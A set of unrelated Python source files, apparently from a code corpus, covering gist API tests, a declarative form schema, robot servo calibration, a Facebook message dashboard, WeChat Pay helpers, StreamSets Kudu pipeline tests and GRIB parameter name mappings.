"/api/gists/%s/star" % self.gist1.id,
status=204,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
)
self.app.get(
"/api/gists/%s/star" % self.gist1.id,
status=404,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
)
def test_fork_a_gist(self):
ret = self.app.post(
"/api/gists/%s/forks" % self.gist1.id,
status=201,
headers=dict(Authorization="Bearer %s" % self.api_token2.token)
).json
self.assertTrue('url' in ret)
def test_delete_a_gist(self):
self.app.delete(
"/api/gists/%s/" % self.gist1.id,
status=204,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
)
self.app.get(
"/api/gists/%s/" % self.gist1.id,
status=404,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
)
def test_get_gist_comments(self):
GistComment.add(self.gist1.id, 'xutao', "sent from iCode")
GistComment.add(
self.gist1.id, 'chengeng', "sent from Code for Android")
ret = self.app.get(
"/api/gists/%s/comments/" % self.gist1.id,
status=200,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertEquals(len(ret), 2)
|
<reponame>wheeler-microfluidics/flatland-fork<gh_stars>0
# -*- coding: utf-8; fill-column: 78 -*-
"""Class attribute-style declarative schema construction."""
from flatland.schema.base import Element
from flatland.schema.containers import Dict
__all__ = 'Form',
class _MetaForm(type):
"""Allows fields to be specified as class attribute declarations.
Processes class declarations of the form:
from flatland import Form, String
class MyForm(Form):
name = String
favorite_color = String.using(optional=True)
and converts them to a :attr:`~flatland.Dict.field_schema` specification
at class construction time. Forms may inherit from other Forms, with
schema declarations following normal Python class property inheritance
semantics.
"""
def __new__(self, class_name, bases, members):
fields = _ElementCollection()
# collect existing fields from super classes in __mro__ order
for base in bases:
fields.add_unseen(getattr(base, 'field_schema', ()))
# add / replace fields supplied in a field_schema on this class
fields.add_and_overwrite(members.get('field_schema', ()))
# add / replace fields declared as attributes on this class
declared_fields = []
for name, value in members.items():
# TODO warn about instances found here?
if isinstance(value, type) and issubclass(value, Element):
if name != value.name:
value = value.named(name)
declared_fields.append(value)
del members[name]
fields.add_and_overwrite(declared_fields)
# the new type's field_schema is the final result of all this
members['field_schema'] = fields.elements
return type.__new__(self, class_name, bases, members)
class _ElementCollection(object):
"""Internal helper collection for calculating Form field inheritance."""
def __init__(self):
self.elements = []
self.names = set()
def add_unseen(self, iterable):
"""Add new items from *iterable*."""
for field in iterable:
if field.name in self.names:
continue
self.elements.append(field)
self.names.add(field.name)
def add_and_overwrite(self, iterable):
"""Add from *iterable*, replacing existing items of the same name."""
for field in iterable:
if field.name in self.names:
for have in self.elements:
if have.name == field.name:
self.elements.remove(have)
break
self.names.add(field.name)
self.elements.append(field)
class Form(Dict):
"""A declarative collection of named fields.
Forms behave like :class:`flatland.Dict`, but are defined with Python
class syntax:
.. doctest::
>>> from flatland import Form, String
>>> class HelloForm(Form):
... hello = String
... world = String
...
Fields are assigned names from the declaration. If a named schema is
used, a renamed copy will be assigned to the Form.
.. doctest::
>>> class HelloForm(Form):
... hello = String.named('hello') # redundant
... world = String.named('goodbye') # will be renamed 'world'
...
>>> form = HelloForm()
>>> sorted(form.keys())
[u'hello', u'world']
Forms may embed other container fields and other forms:
.. doctest::
>>> from flatland import List
>>> class BigForm(Form):
... main_hello = HelloForm
... alt_hello = List.of(String.named('alt_name'),
... HelloForm.named('alt_hello'))
...
This would create a form with one ``HelloForm`` embedded as
``main_hello``, and a list of zero or more dicts, each containing an
``alt_name`` and another ``HelloForm`` named ``alt_hello``.
Forms may inherit from other Forms or Dicts. Field declared in a subclass
will override those of a superclass. Multiple inheritance is supported.
The special behavior of ``Form`` is limited to class construction time
only. After construction, the ``Form`` acts exactly like a
:class:`~flatland.Dict`. In particular, fields declared in class
attribute style do **not** remain class attributes. They are removed from
the class dictionary and placed in the
:attr:`~flatland.Dict.field_schema`:
.. doctest::
>>> hasattr(HelloForm, 'hello')
False
>>> sorted([field.name for field in HelloForm.field_schema])
[u'hello', u'world']
The order of ``field_schema`` after construction is undefined.
"""
__metaclass__ = _MetaForm
# TODO:
# some kind of validator merging helper? or punt?
|
import pigpio
from pupper.HardwareInterface import HardwareInterface
from pupper.Config import PWMParams, ServoParams
import numpy as np
def get_motor_name(i, j):
motor_type = {0: "abduction", 1: "inner", 2: "outer"} # Top # Bottom
leg_pos = {0: "front-right", 1: "front-left", 2: "back-right", 3: "back-left"}
final_name = motor_type[i] + " " + leg_pos[j]
return final_name
def get_motor_setpoint(i, j):
data = np.array([[0, 0, 0, 0], [45, 45, 45, 45], [45, 45, 45, 45]])
return data[i, j]
def degrees_to_radians(input_array):
"""Converts degrees to radians.
Parameters
----------
input_array : Numpy array or float
Degrees
Returns
-------
Numpy array or float
Radians
"""
return np.pi / 180.0 * input_array
def step_until(hardware_interface, axis, leg, set_point):
"""Returns the angle offset needed to correct a given link by asking the user for input.
Returns
-------
Float
Angle offset needed to correct the link.
"""
found_position = False
set_names = ["horizontal", "horizontal", "vertical"]
offset = 0
while not found_position:
move_input = str(
input("Enter 'a' or 'b' to move the link until it is **" + set_names[axis] + "**. Enter 'd' when done. Input: "
)
)
if move_input == "a":
offset += 1.0
hardware_interface.set_actuator_position(
degrees_to_radians(set_point + offset),
axis,
leg,
)
elif move_input == "b":
offset -= 1.0
hardware_interface.set_actuator_position(
degrees_to_radians(set_point + offset),
axis,
leg,
)
elif move_input == "d":
found_position = True
print("Offset: ", offset)
return offset
def calibrate_angle_offset(hardware_interface):
"""Calibrate the angle offset for the twelve motors on the robot. Note that servo_params is modified in-place.
Parameters
----------
servo_params : ServoParams
Servo parameters. This variable is updated in-place.
pi_board : Pi
RaspberryPi object.
pwm_params : PWMParams
PWMParams object.
"""
# Found K value of (11.4)
k = float(
input("Enter the scaling constant for your servo. This constant is how much you have to increase the pwm pulse width (in microseconds) to rotate the servo output 1 degree. (It is 11.333 for the newer CLS6336 and CLS6327 servos). Input: ")
)
hardware_interface.servo_params.micros_per_rad = k * 180 / np.pi
hardware_interface.servo_params.neutral_angle_degrees = np.zeros((3, 4))
for leg_index in range(4):
for axis in range(3):
# Loop until we're satisfied with the calibration
completed = False
while not completed:
motor_name = get_motor_name(axis, leg_index)
print("\n\nCalibrating the **" + motor_name + " motor **")
set_point = get_motor_setpoint(axis, leg_index)
# Zero out the neutral angle
hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index] = 0
# Move servo to set_point angle
hardware_interface.set_actuator_position(
degrees_to_radians(set_point),
axis,
leg_index,
)
# Adjust the angle using keyboard input until it matches the reference angle
offset = step_until(
hardware_interface, axis, leg_index, set_point
)
print("Final offset: ", offset)
# The upper leg link has a different equation because we're calibrating to make it horizontal, not vertical
if axis == 1:
hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index] = set_point - offset
else:
hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index] = -(set_point + offset)
print("Calibrated neutral angle: ", hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index])
# Send the servo command using the new beta value and check that it's ok
hardware_interface.set_actuator_position(
degrees_to_radians([0, 45, -45][axis]),
axis,
leg_index,
)
okay = ""
prompt = "The leg should be at exactly **" + ["horizontal", "45 degrees", "45 degrees"][axis] + "**. Are you satisfied? Enter 'yes' or 'no': "
while okay not in ["yes", "no"]:
okay = str(
input(prompt)
)
completed = okay == "yes"
def main():
"""Main program
"""
hardware_interface = HardwareInterface()
calibrate_angle_offset(hardware_interface)
print("\n\n CALIBRATION COMPLETE!\n")
print("Calibrated neutral angles:")
print(hardware_interface.servo_params.neutral_angle_degrees)
print("Copy these values into the NEUTRAL_ANGLE_DEGREES matrix defined pupper/HardwareConfig.py")
print("Set the MICROS_PER_RAD value in pupper/HardwareConfig.py to whatever you defined in the beginning of this program as well.")
main()
|
<reponame>julienschuermans/fb-analysis
import logging
import plotly.express as px
import dash_core_components as dcc
import dash_html_components as html
from modules.network import plot_graph
from modules.messages import *
from config import MY_NAME
def get_layout(df):
total_sent = len(df.loc[df.sender_name == MY_NAME])
total_received = len(df.loc[df.sender_name != MY_NAME])
first_message_date = df.timestamp.min().strftime('%d-%m-%Y')
last_message_date = df.timestamp.max().strftime('%d-%m-%Y')
layout = html.Div(children=[
html.H1(children='Facebook Messages'),
html.Div(children=f'''
Explore {total_sent} messages sent and {total_received} received between {first_message_date} and {last_message_date}
'''),
dcc.Tabs(children=[
dcc.Tab(label='Personal Stats', value="1"),
dcc.Tab(label='Chat Analysis', value="2"),
dcc.Tab(label='Contact Info', value="3"),
dcc.Tab(label='Network Graph', value="4"),
dcc.Tab(label='Photo Viewer', value="5"),
],
value="1",
id='tabs'
),
html.Div(id='tab-output')
])
return layout
def get_tab1(df):
contact_counts = get_total_msg_count_per_contact(df)
weekly_pattern = get_weekly_activity_pattern(df)
tab1 = [
html.H4('#Messages sent/received'),
html.Label('Select a timeframe'),
dcc.Dropdown(style={'width': '49%', 'display': 'inline-block'},
id='global-timeframe-dropdown',
options=[
{'label': item, 'value': item} for item in ['Hourly', 'Daily', 'Monthly', 'Yearly']
],
value='Monthly'
),
dcc.Graph(id='sent-received-bar-graph'),
html.H4('Weekly activity'),
dcc.Graph(
id='weekly-activity-heatmap',
figure=px.imshow(weekly_pattern.T,
labels=dict(
y="Day of Week", x="Time of Day", color="#Messages sent"),
y=['Monday', 'Tuesday', 'Wednesday',
'Thursday', 'Friday', 'Saturday', 'Sunday'],
x=[str(x)+'h' for x in range(24)]
)
),
html.H4('#Messages per contact'),
dcc.Graph(id='contact-count-bar-graph',
figure={
'data': [
{
'x': contact_counts['theirs'][0],
'y': contact_counts['theirs'][1],
'type': 'bar',
},
],
}
),
]
return tab1
def get_tab2(df):
tab2 = [
html.Div(children=[
html.Label('Select a chat', style={
'width': '49%', 'display': 'inline-block'}),
html.Label('Select a timeframe', style={
'width': '49%', 'display': 'inline-block'}),
]),
html.Div(children=[
dcc.Dropdown(style={'width': '49%', 'display': 'inline-block'},
id='chat-dropdown',
options=[
{'label': title, 'value': title} for title in list_chat_titles(df)
],
value=list_chat_titles(df)[0]
),
dcc.Dropdown(style={'width': '49%', 'display': 'inline-block'},
id='timeframe-dropdown',
options=[
{'label': item, 'value': item} for item in ['Hourly', 'Daily', 'Monthly', 'Yearly']
],
value='Monthly'
),
]),
dcc.Graph(id='msg-count-lines'),
html.Div(children=[
dcc.Graph(style={'width': '49%', 'display': 'inline-block'},
id='hourly-bars'),
dcc.Graph(style={'width': '49%', 'display': 'inline-block'},
id='weekly-bars'),
]),
html.H4('#Messages per participant'),
dcc.Graph(id='participants-pie-chart'),
html.H4('Top words per participant'),
html.Table(id='top-words-table'),
]
return tab2
def get_tab3(df):
all_contacts = list_contacts(df)
tab3 = [
html.H4('Stats per contact'),
html.Label('Select one or more contacts'),
dcc.Dropdown(id='contact-select-dropdown',
options=[
{'label': contact, 'value': contact} for contact in all_contacts],
value=all_contacts[:5],
multi=True
),
html.Table(id='contacts-table'),
]
return tab3
def get_tab4(G):
fig = plot_graph(G)
tab4 = [
html.H4('Network Interactions'),
dcc.Graph(
figure=fig,
),
]
return tab4
def get_tab5(df_photos):
photos_selection = filter_df_on_title(
df_photos, list_chat_titles(df_photos)[0])
photos_selection = photos_selection.sort_values('timestamp')
list_of_filenames = photos_selection.photo_uri.tolist()
tab5 = [
html.Label('Select a chat'),
dcc.Dropdown(id='chat-dropdown-media',
options=[
{'label': title, 'value': title} for title in list_chat_titles(df_photos)
],
value=list_chat_titles(df_photos)[0]
),
html.H4(id='img-count'),
html.H4(id='img-details',
style={
'text-align': 'center',
'vertical-align': 'middle',
}),
html.Div(id='img-container'),
html.H5(id='img-date',
style={
'margin-bottom': '20px',
'text-align': 'center',
'vertical-align': 'middle',
}),
html.Div(
children=[
dcc.Slider(
id='my-slider',
min=0,
step=1
),
],
style={
'margin-bottom': '50px',
'margin-right': '20px',
'margin-left': '20px',
}
),
]
return tab5
|
<filename>WeChatPayment.py
import random
import requests
import urllib.parse
import datetime
import hashlib
from random import Random
from bs4 import BeautifulSoup
from . import conf
def get_sign(data_dict, key):
"""
签名函数
:param data_dict: 需要签名的参数,格式为字典
:param key: 密钥 ,即上面的API_KEY
:return: 字符串
"""
params_list = sorted(data_dict.items(), key=lambda e: e[0], reverse=False) # 参数字典倒排序为列表
params_str = "&".join(u"{}={}".format(k, v) for k, v in params_list) + '&key=' + key
# 组织参数字符串并在末尾添加商户交易密钥
md5 = hashlib.md5() # 使用MD5加密模式
md5.update(params_str.encode('utf-8')) # 将参数字符串传入
sign = md5.hexdigest().upper() # 完成加密并转为大写
return sign
def random_str(randomlength=8):
"""
生成随机字符串
:param randomlength: 字符串长度
:return:
"""
strs = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
length = len(chars) - 1
random = Random()
for i in range(randomlength):
strs += chars[random.randint(0, length)]
return strs
def trans_dict_to_xml(data_dict):
"""
定义字典转XML的函数
:param data_dict:
:return:
"""
data_xml = []
for k in sorted(data_dict.keys()): # 遍历字典排序后的key
v = data_dict.get(k) # 取出字典中key对应的value
if k == 'detail' and not v.startswith('<![CDATA['): # 添加XML标记
v = '<![CDATA[{}]]>'.format(v)
data_xml.append('<{key}>{value}</{key}>'.format(key=k, value=v))
return '<xml>{}</xml>'.format(''.join(data_xml)) # 返回XML
def trans_xml_to_dict(data_xml):
"""
定义XML转字典的函数
:param data_xml:
:return:
"""
soup = BeautifulSoup(data_xml, features='xml')
xml = soup.find('xml') # 解析XML
if not xml:
return {}
data_dict = dict([(item.name, item.text) for item in xml.find_all()])
return data_dict
def get_wechat_pay_url(order_id, total_fee, product_id,body,spbill_create_ip,redirect_url=conf.task_redirect_url):
"""
返回手机支付链接
"""
nonce_str = random_str() # 拼接出随机的字符串即可,我这里是用 时间+随机数字+5个随机字母
params = {
'appid': conf.appid, # APPID 公众平台
'mch_id': conf.mch_id, # 商户号
'nonce_str': nonce_str, # 随机字符串
'out_trade_no': order_id, # 订单编号,可自定义
'total_fee': total_fee, # 订单总金额(单位分,必须是整数)
'spbill_create_ip': spbill_create_ip, # 客户端ip
'notify_url': conf.notify_url, # 回调地址,微信支付成功后会回调这个url,告知商户支付结果
'body': body, # 商品描述
'product_id': product_id, # 商品id
'trade_type': 'MWEB', # H5支付
'scene_info':{"h5_info" :{"type": "Wap","wap_url": "","wap_name": ""}}
}
sign = get_sign(params, conf.api_key) # 获取签名
params['sign'] = sign # 添加签名到参数字典
# print(params)
xml = trans_dict_to_xml(params) # 转换字典为XML
response = requests.request('post', 'https://api.mch.weixin.qq.com/pay/unifiedorder', data=xml.encode('utf-8')) # 以POST方式向微信公众平台服务器发起请求
# print(response.content)
data_dict = trans_xml_to_dict(response.content) # 将请求返回的数据转为字典
mweb_url = data_dict.get('mweb_url', None)
if mweb_url:
ret_redirect_url = urllib.parse.urlencode({'redirect_url':redirect_url})
mweb_url = mweb_url + '&' + ret_redirect_url
return mweb_url
def order_query(order_id):
"""查询订单支付状态"""
url = 'https://api.mch.weixin.qq.com/pay/orderquery'
nonce_str = random_str() # 拼接出随机的字符串即可,我这里是用 时间+随机数字+5个随机字母
params = {
'appid': conf.appid, # APPID 公众平台 wx6048923d456554e8
'mch_id': conf.mch_id, # 商户号
'nonce_str': nonce_str, # 随机字符串
'out_trade_no': order_id, # 订单编号,可自定义
}
sign = get_sign(params, conf.api_key) # 获取签名
params['sign'] = sign # 添加签名到参数字典
xml = trans_dict_to_xml(params) # 转换字典为XML
response = requests.request('post', url, data=xml.encode('utf-8')) # 以POST方式向微信公众平台服务器发起请求
data_dict = trans_xml_to_dict(response.content) # 将请求返回的数据转为字典
return data_dict
def enterprise_payment(order_id,openid,amount):
"""
企业付款
:param order_id: 提现订单id
:param openid: 提现用户openid
:param amount: 提现金额
:return:
"""
url = 'https://api.mch.weixin.qq.com/mmpaymkttransfers/promotion/transfers'
nonce_str = random_str()
postdata = {
'mch_appid':conf.appid,
'mchid':conf.mch_id,
'nonce_str':nonce_str,
'partner_trade_no':order_id,
'openid':openid,
'check_name':'NO_CHECK', # 是否校验用户姓名
'amount':amount,
'desc':'收益提现'
}
sign = get_sign(postdata, conf.api_key) # 获取签名
postdata['sign'] = sign # 添加签名到参数字典
xml = trans_dict_to_xml(postdata) # 转换字典为XML
response = requests.request('post', url, data=xml.encode('utf-8'),cert=(conf.WXPAY_CLIENT_CERT_PATH, conf.WXPAY_CLIENT_KEY_PATH))
data_dict = trans_xml_to_dict(response.content) # 将请求返回的数据转为字典
print(data_dict)
return data_dict
def enterprise_payment_query(order_id):
"""
企业付款结果查询
:param order_id: 付款订单id
:return:
"""
nonce_str = random_str()
postdata = {
'mch_appid': conf.appid,
'mchid': conf.mch_id,
'nonce_str': nonce_str,
'partner_trade_no': order_id
}
sign = get_sign(postdata, conf.api_key) # 获取签名
postdata['sign'] = sign # 添加签名到参数字典
xml = trans_dict_to_xml(postdata) # 转换字典为XML
# 要特别注意的是需要带证书(微信支付签发的)
# 以POST方式向微信公众平台服务器发起请求
response = requests.request('post', url, data=xml.encode('utf-8'),cert=(conf.WXPAY_CLIENT_CERT_PATH, conf.WXPAY_CLIENT_KEY_PATH))
data_dict = trans_xml_to_dict(response.content) # 将请求返回的数据转为字典
if data_dict['status'] == 'SUCCESS':
print('成功')
elif data_dict['status'] == 'PROCESSING':
print('处理中')
else:
print('失败')
print(data_dict['reason'],'失败原因')
return data_dict
|
<gh_stars>10-100
# Copyright 2020 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import string
import time
from datetime import datetime
from decimal import Decimal
import pytest
import sqlalchemy
from streamsets.testframework.markers import cluster, sdc_min_version
from streamsets.testframework.utils import get_random_string, Version
logger = logging.getLogger(__name__)
DEFAULT_KUDU_PORT = 7051
@cluster('cdh')
def test_kudu_destination(sdc_builder, sdc_executor, cluster):
"""Simple Dev Raw Data Source to Kudu pipeline.
dev_raw_data_source >> kudu
"""
if not hasattr(cluster, 'kudu'):
pytest.skip('Kudu tests only run against clusters with the Kudu service present.')
# Generate some data.
tour_de_france_contenders = [dict(favorite_rank=1, name='<NAME>', wins=3),
dict(favorite_rank=2, name='<NAME>', wins=3),
dict(favorite_rank=4, name='<NAME>', wins=1),
dict(favorite_rank=3, name='<NAME>', wins=0)]
raw_data = ''.join([json.dumps(contender) for contender in tour_de_france_contenders])
# For a little more coverage, we'll map the "favorite_rank" record field to the "rank" column in Kudu.
# These rankings are Dima's opinion and not reflective of the views of StreamSets, Inc.
field_to_column_mapping = [dict(field='/favorite_rank', columnName='rank')]
kudu_table_name = get_random_string(string.ascii_letters, 10)
kudu_master_address = '{}:{}'.format(cluster.server_host, DEFAULT_KUDU_PORT)
# Build the pipeline.
builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = builder.add_stage('Dev Raw Data Source').set_attributes(data_format='JSON',
raw_data=raw_data)
kudu = builder.add_stage('Kudu',
type='destination').set_attributes(table_name='{}.{}'.format('impala::default',
kudu_table_name),
default_operation='INSERT',
field_to_column_mapping=field_to_column_mapping)
dev_raw_data_source >> kudu
pipeline = builder.build().configure_for_environment(cluster)
pipeline.delivery_guarantee = 'AT_MOST_ONCE'
# We want to write data once and then stop, but Dev Raw Data Source will keep looping, so we set the rate limit to
# a low value and will rely upon pipeline metrics to know when to stop the pipeline.
pipeline.rate_limit = 4
metadata = sqlalchemy.MetaData()
tdf_contenders_table = sqlalchemy.Table(kudu_table_name,
metadata,
sqlalchemy.Column('rank', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String),
sqlalchemy.Column('wins', sqlalchemy.Integer),
impala_partition_by='HASH PARTITIONS 16',
impala_stored_as='KUDU',
impala_table_properties={
'kudu.master_addresses': kudu_master_address,
'kudu.num_tablet_replicas': '1'
})
try:
logger.info('Creating Kudu table %s ...', kudu_table_name)
engine = cluster.kudu.engine
tdf_contenders_table.create(engine)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_batch_count(len(tour_de_france_contenders))
sdc_executor.stop_pipeline(pipeline)
connection = engine.connect()
result = connection.execute(sqlalchemy.sql.select([tdf_contenders_table]).order_by('rank'))
assert list(result) == [tuple([item['favorite_rank'], item['name'], item['wins']])
for item in sorted(tour_de_france_contenders, key=lambda key: key['favorite_rank'])]
finally:
logger.info('Dropping Kudu table %s ...', kudu_table_name)
tdf_contenders_table.drop(engine)
@cluster('cdh')
def test_kudu_destination_unixtime_micro_datatype(sdc_builder, sdc_executor, cluster):
"""
Test Kudu's UNIXTIME_MICRO data type support.
dev_raw_data_source >> kudu
"""
if not hasattr(cluster, 'kudu'):
pytest.skip('Kudu tests only run against clusters with the Kudu service present.')
if Version(cluster.version) < Version('cdh5.12.0'):
pytest.skip('Test requires CDH 5.12.0+ to run')
# Generate some data. Kudu does not store microsecond so set it 0.
now = datetime.now().replace(microsecond=0)
now_millisecond = time.mktime(now.timetuple()) * 1000
input_data = [dict(id=1, time=now_millisecond)]
raw_data = ''.join([json.dumps(contender) for contender in input_data])
field_to_column_mapping = [dict(field='/id', columnName='id'),
dict(field='/time', columnName='unixtime_micro')]
kudu_table_name = get_random_string(string.ascii_letters, 10)
kudu_master_address = f'{cluster.server_host}:{DEFAULT_KUDU_PORT}'
# Build the pipeline.
builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = builder.add_stage('Dev Raw Data Source').set_attributes(data_format='JSON',
raw_data=raw_data)
kudu = builder.add_stage('Kudu',
type='destination').set_attributes(table_name='{}.{}'.format('impala::default',
kudu_table_name),
default_operation='INSERT',
field_to_column_mapping=field_to_column_mapping)
dev_raw_data_source >> kudu
pipeline = builder.build().configure_for_environment(cluster)
pipeline.delivery_guarantee = 'AT_MOST_ONCE'
# We want to write data once and then stop, but Dev Raw Data Source will keep looping, so we set the rate limit to
# a low value and will rely upon pipeline metrics to know when to stop the pipeline.
pipeline.rate_limit = 4
metadata = sqlalchemy.MetaData()
test_table = sqlalchemy.Table(kudu_table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('unixtime_micro', sqlalchemy.TIMESTAMP),
impala_partition_by='HASH PARTITIONS 16',
impala_stored_as='KUDU',
impala_table_properties={
'kudu.master_addresses': kudu_master_address,
'kudu.num_tablet_replicas': '1'
})
try:
logger.info('Creating Kudu table %s ...', kudu_table_name)
engine = cluster.kudu.engine
test_table.create(engine)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_batch_count(len(input_data))
sdc_executor.stop_pipeline(pipeline)
connection = engine.connect()
result = connection.execute(sqlalchemy.sql.select([test_table])).fetchone()
assert list(result) == [1, now]
finally:
logger.info('Dropping Kudu table %s ...', kudu_table_name)
test_table.drop(engine)
@cluster('cdh')
@sdc_min_version('3.6.0')
def test_kudu_destination_decimal_type(sdc_builder, sdc_executor, cluster):
"""Simple Dev Raw Data Source to Kudu pipeline inserting column of decimal type and checking later on
decimal type is correctly stored by querying Kudu database
dev_raw_data_source >> kudu
"""
if not hasattr(cluster, 'kudu'):
pytest.skip('Kudu tests only run against clusters with the Kudu service present.')
if not Version(cluster.kudu.version) >= Version('1.7.0'):
pytest.skip(f'Test only designed to run on Kudu version >= 1.7.0, but found {cluster.kudu.version}')
# Generate some data.
tour_de_france_contenders = [dict(favorite_rank=1, name='<NAME>', wins=3, weight=153.22),
dict(favorite_rank=2, name='<NAME>', wins=3, weight=158.73),
dict(favorite_rank=4, name='<NAME>', wins=1, weight=144),
dict(favorite_rank=3, name='<NAME>', wins=0, weight=165.34)]
raw_data = '\n'.join([json.dumps(contender) for contender in tour_de_france_contenders])
field_to_column_mapping = [dict(field='/favorite_rank', columnName='rank'),
dict(field='/name', columnName='name'),
dict(field='/wins', columnName='wins'),
dict(field='/weight', columnName='weight')]
kudu_table_name = get_random_string(string.ascii_letters, 10)
kudu_master_address = '{}:{}'.format(cluster.server_host, DEFAULT_KUDU_PORT)
# Build the pipeline.
builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = builder.add_stage('Dev Raw Data Source').set_attributes(data_format='JSON',
raw_data=raw_data)
kudu = builder.add_stage('Kudu',
type='destination').set_attributes(table_name='{}.{}'.format('impala::default',
kudu_table_name),
default_operation='INSERT',
field_to_column_mapping=field_to_column_mapping)
dev_raw_data_source >> kudu
pipeline = builder.build().configure_for_environment(cluster)
pipeline.delivery_guarantee = 'AT_MOST_ONCE'
# We want to write data once and then stop, but Dev Raw Data Source will keep looping, so we set the rate limit to
# a low value and will rely upon pipeline metrics to know when to stop the pipeline.
pipeline.rate_limit = 4
metadata = sqlalchemy.MetaData()
tdf_contenders_table = sqlalchemy.Table(kudu_table_name,
metadata,
sqlalchemy.Column('rank', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String),
sqlalchemy.Column('wins', sqlalchemy.Integer),
sqlalchemy.Column('weight', sqlalchemy.DECIMAL(5, 2)),
impala_partition_by='HASH PARTITIONS 16',
impala_stored_as='KUDU',
impala_table_properties={
'kudu.master_addresses': kudu_master_address,
'kudu.num_tablet_replicas': '1'
})
try:
logger.info('Creating Kudu table %s ...', kudu_table_name)
engine = cluster.kudu.engine
tdf_contenders_table.create(engine)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_batch_count(len(tour_de_france_contenders))
sdc_executor.stop_pipeline(pipeline)
connection = engine.connect()
result = connection.execute(sqlalchemy.sql.select([tdf_contenders_table]).order_by('rank'))
result_list = list(result)
sorted_tour_de_france_contenders = [tuple([item['favorite_rank'], item['name'], item['wins'],
round(Decimal(item['weight']), 2)])
for item in sorted(tour_de_france_contenders,
key=lambda key: key['favorite_rank'])]
assert result_list == sorted_tour_de_france_contenders
finally:
logger.info('Dropping Kudu table %s ...', kudu_table_name)
tdf_contenders_table.drop(engine)
|
<filename>pyeccodes/defs/grib1/localConcepts/efkl/cfVarName_def.py
import pyeccodes.accessors as _
def load(h):
def wrapped(h):
table2Version = h.get_l('table2Version')
indicatorOfParameter = h.get_l('indicatorOfParameter')
if table2Version == 253 and indicatorOfParameter == 228:
return 'FFG-MS'
if table2Version == 253 and indicatorOfParameter == 210:
return 'REFLTY-DBZ'
if table2Version == 253 and indicatorOfParameter == 209:
return 'FL-MPLTY-N'
if table2Version == 253 and indicatorOfParameter == 204:
return 'RRH-KGM2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'GRI-KGM2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'GR-KGM2'
if table2Version == 253 and indicatorOfParameter == 200:
return 'TKEN-JKG'
if table2Version == 253 and indicatorOfParameter == 187:
return 'CLDTOP-M'
if table2Version == 253 and indicatorOfParameter == 186:
return 'CLDBASE-M'
if table2Version == 253 and indicatorOfParameter == 185:
return 'RRS-KGM2'
if table2Version == 253 and indicatorOfParameter == 184:
return 'SNRI-KGM2'
if table2Version == 253 and indicatorOfParameter == 184:
return 'SNACC-KGM2'
if table2Version == 253 and indicatorOfParameter == 181:
return 'RRI-KGM2'
if table2Version == 253 and indicatorOfParameter == 163:
return 'WGV-MS'
if table2Version == 253 and indicatorOfParameter == 162:
return 'WGU-MS'
if table2Version == 253 and indicatorOfParameter == 160:
return 'CAPE-JKG'
if table2Version == 253 and indicatorOfParameter == 144:
return 'PRECTYPE-N'
if table2Version == 253 and indicatorOfParameter == 135:
return 'ICINGWARN-N'
if table2Version == 253 and indicatorOfParameter == 125:
return 'VFLMOM-NM2'
if table2Version == 253 and indicatorOfParameter == 124:
return 'UFLMOM-NM2'
if table2Version == 253 and indicatorOfParameter == 122:
return 'FLSEN-JM2'
if table2Version == 253 and indicatorOfParameter == 121:
return 'FLLAT-JM2'
if table2Version == 253 and indicatorOfParameter == 117:
return 'RADGLOA-JM2'
if table2Version == 253 and indicatorOfParameter == 115:
return 'RADLWA-JM2'
if table2Version == 253 and indicatorOfParameter == 114:
return 'RTOPLWA-JM2'
if table2Version == 253 and indicatorOfParameter == 114:
return 'RTOPLW-WM2'
if table2Version == 253 and indicatorOfParameter == 113:
return 'RTOPSWA-JM2'
if table2Version == 253 and indicatorOfParameter == 113:
return 'RTOPSW-WM2'
if table2Version == 253 and indicatorOfParameter == 112:
return 'RNETLWA-JM2'
if table2Version == 253 and indicatorOfParameter == 111:
return 'RNETSWA-JM2'
if table2Version == 253 and indicatorOfParameter == 103:
return 'PWS-S'
if table2Version == 253 and indicatorOfParameter == 102:
return 'HWS-M'
if table2Version == 253 and indicatorOfParameter == 101:
return 'DW-D'
if table2Version == 253 and indicatorOfParameter == 91:
return 'IC-0TO1'
if table2Version == 253 and indicatorOfParameter == 86:
return 'SM-KGM2'
if table2Version == 253 and indicatorOfParameter == 84:
return 'ALBEDO'
if table2Version == 253 and indicatorOfParameter == 83:
return 'SR-M'
if table2Version == 253 and indicatorOfParameter == 81:
return 'LC-0TO1'
if table2Version == 253 and indicatorOfParameter == 76:
return 'CLDWAT-KGKG'
if table2Version == 253 and indicatorOfParameter == 75:
return 'NH-PRCNT'
if table2Version == 253 and indicatorOfParameter == 74:
return 'NM-PRCNT'
if table2Version == 253 and indicatorOfParameter == 73:
return 'NL-PRCNT'
if table2Version == 253 and indicatorOfParameter == 71:
return 'N-0TO1'
if table2Version == 253 and indicatorOfParameter == 67:
return 'MIXHGT-M'
if table2Version == 253 and indicatorOfParameter == 66:
return 'SD-M'
